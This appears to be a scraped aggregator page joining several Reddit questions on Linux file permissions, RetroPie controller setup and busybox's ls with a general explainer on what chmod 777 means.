chmod an app?

I've seen chmod used for files/directory permissions but not on an app...
I just read this on a github issue:
But my scenario is that I just wanted to develop and test files in Apache Server's /var/www/html folder. So, I just gave my Atom all read/write access using "chmod 777 atom". It has started to compile and write code in the directory.
Why they chose to resolve that by chmodding their text editor (Atom), I don't know. It would run as their user, and I guess they needed root permissions for the location they wanted to write to. Normally you'd change the permissions of the location instead, though that's not always an option, such as with /etc/. I'm not sure how chmod 777 atom gives read/write access to that location; perhaps they also ran Atom with elevated permissions.
IIRC, atom isn't a single binary but rather a lengthy shell script that does some logic and then calls a binary, which makes it difficult to run as root for editing root-owned files: the shell script would run as root, but the actual application wouldn't have rights to save as root (github issue).
I guess they did this because atom is a shell script rather than a binary? Still not something I've seen (usually you use sudo, or preferably gksu/kdesu or pkexec, to run an app as root, right?).
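The usual alternative to chmodding the editor is to give your user write access to the target directory itself. A sketch, demonstrated on a scratch directory; the /var/www/html path and www-data group in the comments are typical Debian/Ubuntu defaults and are assumptions here:

```shell
# Give the directory group write access plus the setgid bit, so files
# created inside inherit the directory's group. For a real Apache web
# root you would run (as root, values assumed):
#   sudo chown -R "$USER":www-data /var/www/html
#   sudo chmod -R 2775 /var/www/html
mkdir -p scratch-webroot
chmod 2775 scratch-webroot
stat -c '%a' scratch-webroot   # prints 2775
```

This keeps the editor running as an ordinary user while still allowing it to write into the web root, instead of making the whole tree world-writable.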
submitted by kwhali to linuxquestions [link] [comments]

Help getting my controller to work in emulators, and saving states

Hi there! I had a pi 2 and recently tried to get a static IP address on it, but I did something which caused it to not boot into EmulationStation anymore. Even undoing the changes I made in the config file was not working; it would give errors on boot and stay on the text screen. So I decided to make a backup of the SD card, copy my roms folder and the config folder and start over. I also bought a pi 3 to start over with.
I put the latest RetroPie image on the SD card, copied my roms and config folder, and booted it up. I can get in and launch the roms, but my controller doesn't do anything inside the N64 emulator. The only buttons I can get to do anything are Select + Bottom Left Trigger for load state (which says state failed to load, even though I copied a state from my previous pi), and Select + Start to get back to EmulationStation. Strangely, Select + Bottom Right Trigger does not save a state. In the SNES emulator, most buttons seem to work but when I try to save a state, nothing happens (no error) so then trying to load a state fails, since none exist. I can't see any option to map my controller on a per-emulator basis.
I have looked through the config menus that I could find, and I did not see anything that helped. I ran the option to set up RetroPie from binaries, I tried modifying retroarch.cfg, and I ran sudo chmod 777 * on the roms directory, which did change the permissions but did not resolve any issues. I then found the option in the setting to fix ownership in the roms directory automatically, but I am still having the same issues.
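One detail worth noting about the chmod step described above: `sudo chmod 777 *` only matches the top level of the directory, so ROMs and save states inside subdirectories keep their old permissions. A sketch on a scratch tree (the RetroPie layout is only mimicked here):

```shell
# The glob expands to top-level entries only; -R is needed to recurse.
umask 022                              # fix umask so created files are 644
mkdir -p roms-demo/n64
touch roms-demo/n64/game.z64
chmod 777 roms-demo/*                  # changes roms-demo/n64 only
stat -c '%a' roms-demo/n64             # prints 777
stat -c '%a' roms-demo/n64/game.z64    # still 644
chmod -R 777 roms-demo                 # recurses into subdirectories
```

On a stock RetroPie image, fixing ownership (e.g. chown -R to the pi user, which the "fix ownership" option in the setup script does) is usually the more relevant fix for failing save states than mode bits.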
I am using a wireless Xbox 360 controller, which works in EmulationStation. I did turn on the Xbox controller driver option.
I'm sure I am missing something here, could you please direct me to the relevant wiki articles or just let me know how you have resolved these issues when you had them? Any suggestions would be appreciated. At this point, I am willing to wipe it again and start over, if I can copy my save files for Ocarina of Time.
Bonus points would be if I can set up a static IP address for the pi.
submitted by cooldug000 to RetroPie [link] [comments]

'Standard' ls command on busybox?

Hi all
I'm wondering if it is possible to run the standard version of 'ls' on my busybox device. The busybox version of ls lacks the --time-style option, which I need.
At first I thought I could copy in a binary from another device/distro (Raspian, both devices are ARM-based) with the correct ls command, from /bin/ls, but this didn't work. My busybox device says: "-sh: /usbin/ls: not found"
Even though it is there, with chmod 777 and +x.
Anyone have any ideas?
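A common cause of "not found" for a binary that demonstrably exists and is executable: the shell found the file, but the kernel could not find the dynamic linker (interpreter) the binary was built against, e.g. a glibc-linked ls from Raspbian copied onto a musl/uClibc busybox system. A diagnostic sketch (paths are examples):

```shell
# Every ELF binary starts with the bytes \x7f E L F; its required loader
# path is embedded as the "interpreter". If that loader doesn't exist on
# the busybox device, exec fails with a misleading "not found".
head -c 4 /bin/ls | tail -c 3   # prints ELF for any ELF binary
# If available, `file /bin/ls` shows the architecture and interpreter,
# e.g. "interpreter /lib/ld-linux-armhf.so.3"; that loader must exist on
# the target device. A statically linked build (gcc -static) sidesteps
# the problem entirely.
```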
submitted by TobbenTM to linux [link] [comments]


chmod 777 options

When chmod is applied to a directory: read = list files in the directory; write = add new files to the directory; execute = access (enter) files in the directory.

You may know that you need to set a file permission of "777" to make it writable, but do you know what "chmod 777" really means? chmod (change mode) is one of the most frequently used commands in Unix.

Yes, quite right: with the -R option, the chmod command gives all files and subdirectories under the specified directory 777 permissions. But in general it is not good practice to give 777 to all files and directories, as it can compromise data security. Try to be specific when assigning permissions to files and directories.

chmod -R 777 /www/store

The -R (or --recursive) option makes it recursive. Or, if you want to make all the files in the current directory have all permissions, type:

chmod -R 777 ./

If you need more info about the chmod command, see: File permission.

chmod 777 /path/to/file

Hopefully, this article helped you better understand file permissions in Unix systems and the origin of the magical number "777". Now that you've mastered file permissions, you may want to learn how to copy and paste text, files and folders in the Linux terminal, or use the sticky bit to manage files in shared directories.
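The digits themselves decode simply: each octal digit is the sum of read (4), write (2), and execute (1), for owner, group, and others in that order. A quick demonstration:

```shell
# 6 = 4+2 (rw-), 4 = 4 (r--), 0 = --- ; so 640 means
# owner can read/write, group can read, others get nothing.
touch demo.txt
chmod 640 demo.txt
stat -c '%a %A' demo.txt   # prints: 640 -rw-r-----
rm demo.txt
```

By the same arithmetic, 777 = rwx for everyone, which is why it should be a last resort rather than a default.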
